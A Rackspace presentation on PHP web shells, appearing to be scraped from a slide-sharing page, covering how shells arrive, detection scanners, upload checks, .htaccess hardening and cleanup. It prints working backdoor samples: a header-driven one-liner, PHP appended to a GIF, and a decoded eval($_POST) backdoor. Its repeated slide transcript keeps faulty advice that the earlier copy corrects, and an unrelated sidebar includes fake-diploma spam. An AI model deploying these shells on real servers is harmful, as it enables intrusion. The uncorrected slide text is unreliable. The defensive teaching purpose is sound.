An introduction to PHP shells
Richard Mahoney, Developer Support Engineer
Created by: Richard Mahoney
Modified Date: 09/05/2013
Classification: Public
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
About Me
•PHP developer before becoming a Linux SysAdmin 6 years ago
•Joined Rackspace in 2013
•Several years of experience with web app security
•Is a Certified Ethical Hacker
About this presentation
•What PHP shells are and why they exist
•Where they come from
•How to defend against the threat
•Removal
•Q & A
So, what is a PHP shell?
What is a PHP shell?
•A malicious file containing PHP functions such as eval() and shell_exec()
•Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE
•Usually obfuscated, e.g. eval(base64_decode('JF9HRVRbY10=')); (that base64 string is just $_GET[c]; real samples nest several layers of base64_decode() and gzinflate())
•Used to run arbitrary commands supplied by the attacker
•The most common variant is the C99 shell
How much of a threat?
•Worst case: root compromise via a kernel exploit or simply by looking through files for passwords
•But that's not really needed...
•As the Apache user it can:
•Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining
•Steal data by using MySQL credentials found in PHP files
•Host illegal material
•Send out huge amounts of spam (very common)
•Be used as a proxy for launching attacks on other servers, including those behind the same firewall
Here’s what one looks like
How did it get onto my server?
Where did it come from?
•The vast majority arrive via vulnerable third-party plugins for WordPress, Joomla, etc.
•Automated bots scan for the presence of these plugins and notify the attacker
•The attacker then uploads the malicious code, typically to an /uploads or /media directory, by exploiting the vulnerable website
•The attacker visits the malicious shell script via a browser or by using a tool such as cURL
•All of these steps can be scripted to continually compromise hosts and build a botnet
•But don't forget (S)FTP credentials or your own code as an attack vector
Defending against the threat
The golden rule
•Never trust user input
•Validate and sanitise as appropriate
•The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe
•Use PHP functions such as filter_var()
•Reject filenames containing null bytes. trim() only strips them from the ends of a string, so check the whole name (e.g. strpos($name, "\0") !== false) and refuse the upload; PHP 5.3.4 and later also refuse paths containing a null byte in the filesystem functions, but do not rely on that alone
•Check the contents of any file uploaded to the server. Do not rely on file extensions
•Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF (the binary header is rendered as text on the slide; the PHP backdoor is appended after the image data):
GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^B
D^A???;???
<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ...
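The upload checks above, as an added example that is not part of the original slides. It is written in Python so that it runs stand-alone; in a PHP application the same checks belong in the code that handles $_FILES. The sample GIFs, the size limit and the function names are this example's own assumptions.

```python
# Added example (not from the original slides): the upload checks the slide
# calls for, written in Python so the logic can be run on its own. In a PHP
# application the same checks go wherever $_FILES is handled. The sample
# files below are constructed here; the function names are this example's own.
import os
import re

# Extension allow-list and the magic bytes each type must start with.
ALLOWED_TYPES = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Anything the PHP engine would treat as an open tag if the file were ever
# parsed as PHP: <?php, <?=, a bare <? (short_open_tag) and the old
# <script language="php"> form.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=|\s)|<script\s+language\s*=\s*['\"]?php",
                        re.IGNORECASE)


def validate_upload(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (accepted, reason) for a client-supplied filename and body."""
    # 1. The name is attacker-controlled: no null bytes (shell.php\0.gif),
    #    no path components, no double extensions (shell.php.gif).
    if "\x00" in filename:
        return False, "null byte in filename"
    if os.path.basename(filename) != filename or filename in ("", ".", ".."):
        return False, "path component in filename"
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension %r not allowed" % ext
    if "." in stem:
        return False, "multiple extensions"
    # 2. Bound the size before looking at the content at all.
    if not data or len(data) > max_bytes:
        return False, "empty or oversized file"
    # 3. Magic bytes must agree with the extension. Necessary, not sufficient:
    #    the GIF on the slide passes this check.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    # 4. Scan the whole body for PHP open tags, not just the header.
    if PHP_TAG_RE.search(data):
        return False, "PHP open tag embedded in file body"
    return True, "ok"


# Constructed samples: a real 1x1 GIF, and the same GIF with a backdoor of
# the kind shown on the slide appended after the image data.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
             b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT_GIF = CLEAN_GIF + (b"\n<?php\n@error_reporting(0); $lol = $_GET['lol'];"
                            b" if (isset($lol)) { eval($lol); }")

if __name__ == "__main__":
    for name, body in [("avatar.gif", CLEAN_GIF), ("avatar.gif", POLYGLOT_GIF),
                       ("shell.php\x00.gif", CLEAN_GIF), ("shell.php.gif", CLEAN_GIF),
                       ("../../index.gif", CLEAN_GIF), ("notes.gif", b"<?php phpinfo();")]:
        print(repr(name), validate_upload(name, body))
```

Even with all four checks this is still a heuristic. The stronger control is to re-encode the image with an image library (which discards trailing data such as the appended backdoor), store it under a server-generated name, and keep the directory unable to execute PHP at all.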
Another example
•Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard WordPress install due to its use in JavaScript libraries:
root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l
33
•But it's easy for an attacker to evade scans. This is a fully working PHP shell:
<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>
Here the request header A names the function to call and header B carries its argument, e.g. A: system and B: id. Note that eval cannot be called this way because it is a language construct rather than a function; before PHP 8 an attacker would use assert instead, which evaluated a string argument as code. Nothing in the file mentions eval, system or any other suspicious name, so a grep for them finds nothing.
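An added example (not from the slides) of scanning for the patterns above rather than for the string eval(: it flags a superglobal used as the callee, an executing function fed from a superglobal, and decoder chains wrapped around a literal, and it does not fire on a file that merely contains eval( inside a string. The rule names, weights, directory walker and sample files are this example's own; the header shell is the one from the slide.

```python
# Added example (not part of the original slides): a heuristic scanner for
# PHP source that looks at how dangerous calls are made instead of grepping
# for 'eval('. The rule names, weights, the sample files and the directory
# walker are this example's own; the header shell is the one from the slide.
import os
import re

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|ENV|FILES)"
EXEC_FUNCS = r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)"
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|strrev|hex2bin|convert_uudecode)"

RULES = [
    # $_SERVER['HTTP_A']($_SERVER['HTTP_B']): the callee itself comes from the request.
    ("callee-from-request",
     re.compile(SUPERGLOBAL + r"\s*\[[^\]]*\]\s*\(")),
    # eval(base64_decode($_POST['e'])): an executing function fed from a
    # superglobal, possibly through one or more decoders.
    ("exec-of-request",
     re.compile(EXEC_FUNCS + r"\s*\(\s*(?:" + DECODERS + r"\s*\(\s*)*" + SUPERGLOBAL)),
    # eval(gzinflate(base64_decode('...'))): an executing function around a
    # decoder chain on a string literal.
    ("exec-of-decoded-literal",
     re.compile(EXEC_FUNCS + r"\s*\(\s*(?:" + DECODERS + r"\s*\(\s*)+['\"]")),
    # preg_replace with the /e modifier evaluated the replacement as PHP (removed in 7.0).
    ("preg-replace-e",
     re.compile(r"preg_replace\s*\(\s*(['\"])/[^'\"]*/[A-Za-z]*e[A-Za-z]*\1")),
    # $f(...): a variable used as a function name. Noisy in frameworks, so it
    # carries a low weight and is meant for ranking, not alerting.
    ("variable-function-call",
     re.compile(r"\$[A-Za-z_]\w*\s*\(")),
]
WEIGHTS = {"callee-from-request": 10, "exec-of-request": 10,
           "exec-of-decoded-literal": 8, "preg-replace-e": 6, "variable-function-call": 2}


def scan_php_source(src):
    """Return [(line_number, rule_name, matched_text)] for one file's source.
    Matching is per line, which is enough for the one-line shells above; a
    shell split across lines needs the file joined first."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append((lineno, name, m.group(0).strip()))
    return findings


def score(findings):
    """Sum rule weights so files can be ranked for manual review."""
    return sum(WEIGHTS[name] for _, name, _ in findings)


def scan_directory(root, exts=(".php", ".phtml", ".phar", ".inc")):
    """Walk a tree and return {path: findings} for PHP-like files that
    triggered at least one rule."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, "r", encoding="latin-1") as f:
                    found = scan_php_source(f.read())
                if found:
                    hits[path] = found
    return hits


# Constructed samples. HEADER_SHELL is the slide's header-driven shell; BENIGN
# merely contains the string 'eval(' and must not fire.
HEADER_SHELL = "<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>"
POST_SHELL = "<?php if(isset($_POST['e']))eval(base64_decode($_POST['e'])); ?>"
LITERAL_SHELL = "<?php\n@error_reporting(0);\nif (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb'))); }\n"
PREG_SHELL = "<?php preg_replace('/.*/e', $_POST['x'], ''); ?>"
BENIGN = "<?php\n// mentions eval( in a string, as a bundled JS library might\n$note = 'never pass user input to eval(';\necho htmlspecialchars($note);\n"

if __name__ == "__main__":
    for label, src in [("header", HEADER_SHELL), ("post", POST_SHELL),
                       ("literal", LITERAL_SHELL), ("preg", PREG_SHELL), ("benign", BENIGN)]:
        found = scan_php_source(src)
        print(label, score(found), found)
```

Run scan_directory() over the document root and sort by score(); the header shell scores 10 while a normal plugin file scores 0 or a handful of low-weight variable-function hits. Attackers can still split strings or build names with chr(), so treat this as triage, not proof of absence.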
What else can I do?
•Create a .htaccess file in any directories which shouldn't contain PHP code (uploads, images, media, cache)
•In the contents:
php_flag engine off
•Note that php_flag only works when PHP runs as an Apache module and AllowOverride permits it (Options); under PHP-FPM or CGI Apache does not know the directive and answers 500 for that directory, so deny requests for PHP files there in the web-server configuration instead
•Ensure SFTP/FTP passwords are strong
•Apache log files should be owned by root and not readable by the web-server user, so that a local file inclusion (LFI) bug cannot be combined with PHP injected into the logs via crafted requests
•Never run Apache as root
•Install anti-virus software and set it to scan on write
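As an added example (not from the slides), here is a .htaccess for an upload directory that combines the php_flag line above with an Apache rule that holds regardless of how PHP is wired in. The directives are Apache's own; the module names listed and the extension pattern are this example's choices.

```apache
# Added example: .htaccess for /uploads, /images and similar directories.
# php_flag only exists when PHP runs as an Apache module, and the module
# name changed between versions (mod_php5.c, mod_php7.c, mod_php.c).
# Outside an IfModule the unknown directive makes Apache answer 500 for
# the directory, e.g. under PHP-FPM.
<IfModule mod_php5.c>
    php_flag engine off
</IfModule>
<IfModule mod_php7.c>
    php_flag engine off
</IfModule>
<IfModule mod_php.c>
    php_flag engine off
</IfModule>

# Holds for mod_php, PHP-FPM and CGI alike: refuse to serve PHP-like files
# from here at all (Apache 2.4 syntax; 2.2 used "Order deny,allow" and
# "Deny from all").
<FilesMatch "\.ph(ar|p[0-9]?|tml)$">
    Require all denied
</FilesMatch>
```

php_flag needs AllowOverride Options and Require needs AllowOverride AuthConfig for the .htaccess to be honoured. Since an attacker who can write into the directory can also overwrite or delete the .htaccess, put the same rules in the virtual host's <Directory> block as well.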
Removal
Example of a compromised server
This /images directory contains 3 PHP shells:
[root@web1 images]# ls -l *.php
-rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php
-rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php
-rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php
The contents of one of them (the base64 string is shown wrapped as on the slide):
<?php
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP
U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNl
NzIzMzY1NjA2MzY4Jzs=')); ?>
Example of a compromised server
Which evaluates to:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '37372b37322e3233302e3135383a767832636b72653e723365606368';
Any POST request carrying base64-encoded PHP in parameter e is executed; the fixed hex string echoed afterwards is hex-encoded ASCII, presumably a marker that lets the attacker's scanner confirm the backdoor is still live.
To make these safe, move them to somewhere like /root/compromised_files if you want to investigate further, or just delete them. Moving (rather than copying and deleting) keeps the modification time, which matters when building a timeline.
If you can't/don't want to move the files, chmod them to 000 and set the owner to root so that the web-server user can neither execute nor edit them. Bear in mind that if the directory itself is writable by the web-server user, the attacker can still delete and recreate the file, so this is a stopgap rather than a fix:
[root@web1 images]# ls -l *.php
---------- 1 root root 123617 Jun 19 16:09 404.php
---------- 1 root root 11684 Jun 19 17:34 mlr2.php
---------- 1 root root 24364 Jun 30 17:43 wso.php
Next steps
•Check for unusual files in places such as /tmp and /var/cache
•Use “ls -la” so that hidden files and directories (names starting with a dot) are shown
•Study the output of “lsof” for unexpected open files and network connections held by the web-server user
•If malicious files owned by root are found, assume a root compromise: wipe the server and reinstall from known-good media
•Update all software on the server, including any CMS addons/plugins
•Perform a virus scan
Any Questions?
Further reading
The Open Web Application Security Project – (OWASP) Top 10: owasp.org
The PHP Security Guide: phpsec.org
/r/Netsec: reddit.com/r/netsec
ASONAM2023_presection_slide_track-recommendation.pdf
 
Carrer goals.pptx and their importance in real life
Carrer goals.pptx  and their importance in real lifeCarrer goals.pptx  and their importance in real life
Carrer goals.pptx and their importance in real life
 
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
The Intersection between Competition and Data Privacy – KEMP – June 2024 OECD...
 
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
 
Using-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptxUsing-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptx
 
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptxThe remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
 
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussionPro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
 
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
 
Disaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other usesDisaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other uses
 
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
 
IEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdfIEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdf
 
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdfWhy Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
Why Psychological Safety Matters for Software Teams - ACE 2024 - Ben Linders.pdf
 
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdfBRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
 

An introduction to PHP shells

  • 9. Where did it come from?
    •The vast majority arrive via vulnerable third-party plugins for WordPress, Joomla etc.
    •Automated bots scan for the presence of these plugins and notify the attacker
    •The attacker then uploads the malicious code, typically to an /uploads or /media directory, by exploiting the vulnerable website
    •The attacker visits the malicious shell script via a browser or by using a tool such as cURL
    •All of these steps could be scripted to continually compromise hosts and build a botnet
    •But don't forget (S)FTP or your own code as an attack vector
  • 10. Defending against the threat
  • 11. The golden rule
    •Never trust user input
    •Validate and sanitise as appropriate
    •The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe
    •Use PHP functions such as filter_var()
    •Strip null bytes from filenames by using trim()
    •Check the contents of any file uploaded to the server. Do not rely on file extensions
    •Or even the first few bytes of it – malicious code can be embedded inside image files, like this GIF:
        GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^B D^A???;???
        <?php @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc']; if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ...
  • 12. Another example
    •Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard WordPress install due to its use in JavaScript libraries:
        root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l
        33
    •But it's easy for an attacker to evade such scans. This is a fully working PHP shell:
        <?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>
      where the HTTP header A is set to the string "eval", and B can be any PHP function.
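A scanner that applies slide 11's advice (check an upload's contents, not its extension or its first bytes) while avoiding the bare 'eval(' noise slide 12 describes. This is an added example in Python, not code from the deck; the sample uploads are constructed here and reuse only the two shell constructs the slides already show.

```python
import re
from typing import List, Optional

# Constructed sample uploads (not from the original deck). The two shells
# reuse the constructs the slides show: PHP appended to a GIF header and the
# header-driven $_SERVER['HTTP_A']($_SERVER['HTTP_B']) one-liner.
GIF_WITH_PHP = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00;"
                b"<?php @error_reporting(0); eval(gzinflate(base64_decode('AAAA')));")
HEADER_SHELL = b"<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>"
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
CLEAN_JS = b"var x = eval('1+1');"   # eval() inside a JS library is legitimate

IMAGE_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif",
               b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg"}

# Byte-level rules so binary uploads can be scanned without decoding them.
RULES = [
    ("php-open-tag", re.compile(rb"<\?(?:php\b|=|\s)", re.I)),
    ("eval-of-decoder", re.compile(
        rb"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    # a superglobal element used as the function name, e.g. $_SERVER['HTTP_A'](...)
    ("superglobal-as-function", re.compile(
        rb"\$_(?:GET|POST|COOKIE|SERVER|REQUEST)\s*\[[^\]]+\]\s*\(", re.I)),
    ("command-exec", re.compile(
        rb"\b(?:shell_exec|passthru|system|proc_open|popen)\s*\(", re.I)),
]

def image_type(data: bytes) -> Optional[str]:
    """Image format according to the leading magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def scan_upload(data: bytes, claimed_ext: str) -> List[str]:
    """Return the findings for one uploaded file; [] means nothing suspicious.
    The magic check alone is not enough: a valid GIF header followed by PHP
    still passes it, so the whole body is scanned as well."""
    findings = []
    kind = image_type(data)
    if claimed_ext.lower() in ("gif", "png", "jpg", "jpeg") and kind is None:
        findings.append("image-extension-without-image-magic")
    for name, rx in RULES:
        if rx.search(data):
            findings.append(name)
    if kind is not None and "php-open-tag" in findings:
        findings.append("php-in-image")
    return findings

if __name__ == "__main__":
    for label, blob, ext in [("gif", GIF_WITH_PHP, "gif"), ("hdr", HEADER_SHELL, "php"),
                             ("png", CLEAN_PNG, "png"), ("js", CLEAN_JS, "js")]:
        print(label, scan_upload(blob, ext) or "clean")
```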
  • 13. What else can I do?
    •Create a .htaccess file in any directory which shouldn't contain PHP code, with the contents:
        php_flag engine off
    •Ensure SFTP/FTP passwords are strong
    •Apache log files should be owned by root to prevent LFI (local file inclusion) attacks
    •Never run Apache as root
    •Install antivirus software and set it to scan on write
  • 14. Removal
  • 15. Example of a compromised server
    This /images directory contains 3 PHP shells:
        [root@web1 images]# ls -l *.php
        -rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php
        -rw-r--r-- 1 apache apache  11684 Jun 19 17:34 mlr2.php
        -rw-r--r-- 1 apache apache  24364 Jun 30 17:43 wso.php
    The contents:
        <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNl NzIzMzY1NjA2MzY4Jzs=')); ?>
  • 16. Example of a compromised server
    Which evaluates to:
        if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '37372b37322e3233302e3135383a767832636b72653e723365606368';
    To make these safe, move them to somewhere like "/root/compromised_files" if you want to investigate further, or just delete them. If you can't or don't want to move the files, chmod them to 000 and set the owner to root to disable access:
        [root@web1 images]# ls -l *.php
        ---------- 1 root root 123617 Jun 19 16:09 404.php
        ---------- 1 root root  11684 Jun 19 17:34 mlr2.php
        ---------- 1 root root  24364 Jun 30 17:43 wso.php
  • 17. Next steps
    •Check for unusual files in places such as /tmp and /var/cache
    •Use "ls -la" to show hidden directories
    •Study the output of "lsof"
    •If malicious files owned by root are found, wipe the server and reinstall
    •Update all software on the server, including any CMS addons/plugins
    •Perform a virus scan
  • 18. Any Questions?
  • 19. Further reading
    The Open Web Application Security Project (OWASP) Top 10: owasp.org
    The PHP Security Guide: phpsec.org
    /r/Netsec: reddit.com/r/netsec
  • 20. RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218
    US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM
    RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM
    RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ
    UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK

Editor's Notes

  1. ----- Meeting Notes (13/05/2014 15:02) -----
     Filesystem permissions
     Consider using safe mode or disabling settings such as allow_url_fopen (new slide)
     + Suhosin, php-fpm, mod_suexec
  2. ----- Meeting Notes (13/05/2014 15:02) -----
     Check Apache access/error logs
     Make sure the holes are closed